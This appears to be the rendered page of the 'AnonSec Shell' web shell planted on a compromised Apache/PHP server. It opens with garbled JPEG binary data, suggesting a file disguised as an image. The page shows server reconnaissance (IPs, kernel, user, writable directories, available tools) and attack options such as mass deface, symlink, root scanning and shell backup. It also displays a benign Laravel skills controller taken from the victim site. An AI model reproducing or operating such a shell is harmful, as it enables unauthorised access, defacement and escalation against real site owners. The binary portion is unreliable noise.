JFIF  H H C nxxd C "     &    !1A2Q"aqBb    1   ? R{~ ,.Y| @sl_޸s[+6ϵG};?2Y`&9LP ?3rj  "@V]:3T -G*P ( *(@AEY]qqqALn +Wtu?)l QU T* Aj- x:˸T u53Vh @PS@ ,i,!"\hPw+E@ ηnu ڶh% (Lvũbb- ?M֍݌٥IHln㏷L(6 9L^"6P  d&1H&8@TUT CJ%eʹFTj4i5=0g J &Wc+3kU@PS@HH33M * "Uc(\`F+b{RxWGk ^#Uj*v' V ,FYKɠMckZٸ]ePP  d\A2glo=WL(6 ^;k"ucoH"b ,PDVlvL_/:̗rN\m dcw T-O$w+FZ5T *Y~l: 99U)8ZAt@GLX*@bijqW;MᎹ،O[5*5*@=qusݝ *EPx՝.~ YИ 3M3@E)GTg%Anp P MUҀhԳW c֦iZ ffR 7qMcyAZT c0bZU k+oG<] APQ T A={PDti@c>>KÚ"q L.1P k6QY7t.k7o  <P &yַܼJZy Wz{UrS @ ~P)Y:A"]Y&ScVO%17 6l4 i4YR5 ruk* ؼdZͨZZ cLakb3N6æ\1`XTloTuT AA 7Uq@2ŬzoʼnБRͪ&8}: e}0ZNΖJ*Ս9˪ޘtao]7$ 9EjS} qt" ( .=Y:V#'H: δ4#6yjѥBB ;WD-ElFf67*\AmAD Q __'2$ TX 9nu'm@iPDT qS`%u%3[nY,  :g = tiX H]ij"+6Z* .~|05s6 ,ǡ ogm+ KtE-BF  ES@(UJ xM~8%g/= Vw[Vh 3lJT  rK -kˎY ٰ  ,ukͱٵf sXDP  ]p]&MS95O+j &f6m463@ t8ЕX=6}HR 5ٶ06 /@嚵*6  " hP@eVDiYQT `7tLf4c?m//B4 laj  L} :E  b#PHQb, yN`rkAb^ |} s4XB4 * ,@[{Ru+%le2} `,kI$U` >OMuh  P % ʵ/ L\5aɕVN1R6 3}ZLj-Dl@ *( K\^i@F@551 k㫖h  Q沬#h XV +;]6z OsFpiX $OQ ) ųl4 YtK'(W AnonSec Shell
AnonSec Shell
Server IP : 52.223.31.75  /  Your IP : 172.31.12.187   [ Reverse IP ]
Web Server : Apache/2.4.67 () OpenSSL/1.0.2k-fips PHP/7.4.33
System : Linux ip-172-31-14-184.eu-central-1.compute.internal 4.14.281-212.502.amzn2.x86_64 #1 SMP Thu May 26 09:52:17 UTC 2022 x86_64
User : apache ( 48)
PHP Version : 7.4.33
Disable Function : NONE
Domains : 4 Domains
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : ON  |  Sudo : ON  |  Pkexec : OFF
Directory :  /var/www_local/modis.angelopescatore.it/app/Http/Controllers/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ HOME ]     [ BACKUP SHELL ]     [ JUMPING ]     [ MASS DEFACE ]     [ SCAN ROOT ]     [ SYMLINK ]     

Current File : /var/www_local/modis.angelopescatore.it/app/Http/Controllers/SkillsController.php
<?php

namespace App\Http\Controllers;

use App\Models\Categories;
use App\Models\Skills;
use Illuminate\Http\Request;

class SkillsController extends Controller
{
    /**
     * Display a listing of the resource.
     *
     * @return \Illuminate\Http\Response
     */
    public function index()
    {
         /**
         * @OA\Get(
         *      path="/skills",
         *      tags={"Skills"},
         *      summary="Get list of skills",
         *      description="If the requests was succesfull the api returns a json array with message <strong>True</strong> and the information requets.<br>Else an error message.",
         *      security={{"bearerAuth":{}}},
         *      @OA\Response(
         *          response=200,
         *          description="Successful operation",
         *        @OA\JsonContent(
         *                example={"status": true,
         *                         "message": {
         *                          {
         *                            "id_skill": 1,
         *                            "name": "php",
         *                            "img_url":"asdansjdnalksjndasdasdasda.dasda.sdad",
         *                            "categories_id": 4,
         *                            "macro_area_id": 2
         *                          },},
         *                        },
         *             ),
         *     @OA\Response(
         *          response=404,
         *          description="NOT FOUND",
         *      ),
         *      @OA\Response(
         *          response=401,
         *          description="UNAUTHORIZED",
         *        @OA\JsonContent(
         *                example={"status": false,
         *                  "message": "Error!",
         *                          },
         *             ),
         *        ),
         *     ),
         *     )
         */
        $skills = Skills::all();

        for($i = 0; $i <  count($skills); $i ++){
          
            $category = Categories::find($skills[$i]["category_id"]);
            $skills[$i]["category_parent_id"] = intval($category->id_categoryRoot);
            $skills[$i]["id_macro_area"] = intval($category->macro_areas_id);
        } 
        return response()->json(["status" => true, "message" => $skills],200);
    }

    /**
     * Store a newly created resource in storage.
     *
     * @param  \Illuminate\Http\Request  $request
     * @return \Illuminate\Http\Response
     */
    public function store(Request $request)
    {
        /**
         * @OA\Put(
         *      path="/skill",
         *      tags={"Skills"},
         *      summary="Put a new Skill",
         *      description="Can insert a new Skill.<br>
         *       Return a json array with message <strong>True</strong> if the request was succesfull.<br>
         *       Else an error message",
         *      security={{"bearerAuth":{}}},
         *          @OA\Parameter(
         *          name="name",
         *          in="query",
         *          required = true,
         *          @OA\Schema(
         *              type="string"
         *          )
         *      ),
         *          @OA\Parameter(
         *          name="img_url",
         *          in="query",
         *          required = true,
         *          @OA\Schema(
         *              type="string"
         *          )
         *      ),
         *          @OA\Parameter(
         *          name="categories_id",
         *          in="query",
         *          required = true,
         *          @OA\Schema(
         *              type="integer"
         *          )
         *      ),
         *          @OA\Parameter(
         *          name="macro_area_id",
         *          in="query",
         *          required = true,
         *          @OA\Schema(
         *              type="integer"
         *          )
         *      ),
         *      @OA\Response(
         *          response=200,
         *          description="Successful operation",
         *        @OA\JsonContent(
         *                example={"status": true,
         *                           "message":"Skill Inserted!."},
         *        ),
         *     ),
         *
         *     @OA\Response(
         *          response=404,
         *          description="NOT FOUND",
         *      ),
         *      @OA\Response(
         *          response=401,
         *          description="UNAUTHORIZED",
         *        @OA\JsonContent(
         *                example={"status": false,
         *                  "message": "Please send a token in Authorization Bearer!",
         *                          },
         *             ),
         *        ),
         *     )
         */
        $skills = Skills::create($request->all())->toArray();
        if($skills){
            return response()->json(["status" => true, "message" => "Skill Inserted!"],200);
        }
        return response()->json(["status" => true, "message" => "Could not insert skill!"],200);
    }

    /**
     * Display the specified resource.
     *
     * @param  int  $i
     * @return \Illuminate\Http\Response
     */
    public function show($id)
    {
        /**
         * @OA\Get(
         *      path="/skill/{id_skill}",
         *      tags={"Skills"},
         *      summary="Return a single Skill",
         *      description="If the requests was succesfull the api returns a json array with message <strong>True</strong> and the information requets.<br>Else an error message.",
         *     security={{"bearerAuth":{}}},
         *      @OA\Parameter(
         *          name="id_skill",
         *          in="path",
         *          required = true,
         *          @OA\Schema(
         *              type="integer"
         *          )
         *      ),
         *      @OA\Response(
         *          response=200,
         *          description="Successful operation",
         *        @OA\JsonContent(
         *                example={"status": true,
         *                         "message": {
         *                            "id_skill": 1,
         *                            "name": "php",
         *                            "img_url": "asdansjdnalksjndasdasdasda.dasda.sdad",
         *                            "categories_id": 4,
         *                            "macro_area_id": 2
         *                          },
         *                        },
         *             ),
         *     @OA\Response(
         *          response=404,
         *          description="NOT FOUND",
         *      ),
         *      @OA\Response(
         *          response=401,
         *          description="UNAUTHORIZED",
         *        @OA\JsonContent(
         *                example={"status": false,
         *                  "message": "Skill not found!",
         *                          },
         *             ),
         *        ),
         *     ),
         *     )
         */
        $skill = Skills::find($id); //->join("categories","skills.categories_id","=","categories.id_categories")->get();
        if($skill){
            $category = Categories::find($skill->categories_id);
            if($category){
                $skill->category = $category;
            }
            return  $skill;
        }
     
    }

    public function getSkill($id){
        $skill = Skills::find($id);
        return $skill;
    }

    public function getSkillsByCategory($id_category){
               
        /**
         * @OA\Get(
         *      path="/skillsByCategory/{id_category}",
         *      tags={"Skills"},
         *      summary="Return skills by category",
         *      description="If the requests was succesfull the api returns a json array with message <strong>True</strong> and the information requets.<br>Else an error message.",
         *     security={{"bearerAuth":{}}},
         *      @OA\Parameter(
         *          name="id_category",
         *          in="path",
         *          required = true,
         *          @OA\Schema(
         *              type="integer"
         *          )
         *      ),
         *      @OA\Response(
         *          response=200,
         *          description="Successful operation",
         *        @OA\JsonContent(
         *                example={"status": true,
         *                         "message": {
         *                            "id_skill": 1,
         *                            "name": "php",
         *                            "img_url": "asdansjdnalksjndasdasdasda.dasda.sdad",
         *                            "categories_id": 4,
         *                            "macro_area_id": 2
         *                          },
         *                        },
         *             ),
         *     @OA\Response(
         *          response=404,
         *          description="NOT FOUND",
         *      ),
         *      @OA\Response(
         *          response=401,
         *          description="UNAUTHORIZED",
         *        @OA\JsonContent(
         *                example={"status": false,
         *                  "message": "Skill not found!",
         *                          },
         *             ),
         *        ),
         *     ),
         *     )
         */
        $skills = Skills::where("category_id",$id_category)->get();
        if($skills){
            return response()->json(["status" => true, "message" => $skills],200);
        }else{
            return response()->json(["status" => false, "message" => "Can't find the skill!"],201);
        }
    }
 

    /**
     * Update the specified resource in storage.
     *
     * @param  \Illuminate\Http\Request  $request
     * @param  int  $id
     * @return \Illuminate\Http\Response
     */
    public function update(Request $request, $id)
    {
         /**
         * @OA\Post(
         *      path="/skill/{id_skill}",
         *      tags={"Skills"},
         *      summary="Update Skill",
         *      description="If the requests was succesfull the api returns a json array with message <strong>True</strong> and the information requets.<br>Else an error message.",
         *     security={{"bearerAuth":{}}},
         *          @OA\Parameter(
         *          name="id_skill",
         *          in="path",
         *          required = true,
         *          @OA\Schema(
         *              type="integer"
         *          )
         *      ),
         *          @OA\Parameter(
         *          name="name",
         *          in="query",
         *          @OA\Schema(
         *              type="string"
         *          )
         *      ),
         *          @OA\Parameter(
         *          name="img_url",
         *          in="query",
         *          @OA\Schema(
         *              type="string"
         *          )
         *      ),
         *      @OA\Parameter(
         *          name="categories_id",
         *          in="query",
         *          @OA\Schema(
         *              type="string"
         *          )
         *      ),
         *         @OA\Parameter(
         *          name="macro_area_id",
         *          in="query",
         *          required = true,
         *          @OA\Schema(
         *              type="integer"
         *          )
         *      ),
         *      @OA\Response(
         *          response=200,
         *          description="Successful operation",
         *        @OA\JsonContent(
         *   example={"status": false,
         *                  "message": "could not be Updated!",
         *                          },
         *             ),
         *     ),
         *     @OA\Response(
         *          response=404,
         *          description="NOT FOUND",
         *      ),
         *      @OA\Response(
         *          response=401,
         *          description="UNAUTHORIZED",
         *        @OA\JsonContent(
         *                example={"status": false,
         *                  "message": "Skill  not found!",
         *                          },
         *             ),
         *        ),
         *     ),
         *     )
         */
        $skills = Skills::find($id);
        if($skills){
            if($skills->update($request->all())){
                return response()->json(["status" => true, "message" => "Skill updated!"],200);
            }
            return response()->json(["status" => false, "message" => "Could not update skill!"],200);
        }
        return Response()->json(["status" => false, "message" => "Couldn't find the skill!"],200);
    }

    /**
     * Remove the specified resource from storage.
     *
     * @param  int  $id
     * @return \Illuminate\Http\Response
     */
    public function destroy($id)
    {

        /**
         * @OA\delete(
         *      path="/skill/{id_skill}",
         *      tags={"Skills"},
         *      summary="Delete Skill",
         *      description="If the requests was succesfull the api returns a json array with message <strong>True</strong> and the information requets.<br>Else an error message.",
         *     security={{"bearerAuth":{}}},
         *      @OA\Parameter(
         *          name="id_skill",
         *          in="path",
         *          required = true,
         *          @OA\Schema(
         *              type="integer"
         *          )
         *      ),
         *      @OA\Response(
         *          response=200,
         *          description="Successful operation",
         *        @OA\JsonContent(
         *   example={"status": true,
         *                  "message": "Deleted!",
         *                          },
         *             ),
         *     ),
         *     @OA\Response(
         *          response=404,
         *          description="NOT FOUND",
         *      ),
         *      @OA\Response(
         *          response=401,
         *          description="UNAUTHORIZED",
         *        @OA\JsonContent(
         *                example={"status": false,
         *                  "message": "Skill not found!",
         *                          },
         *             ),
         *        ),
         *     ),
         *     )
         */
        $skills = Skills::find($id);
        if($skills){
            if($skills->delete()){
                return response()->json(["status" => true, "message" => "Skill deleted!"],200);
            }
            return response()->json(["status" => false, "message" => "Skill could not be deleted!"],200);
        }
        return response()->json(["status" => false,"message"=> "Skill does not exist!"],200);
    }
}

Anon7 - 2022
AnonSec Team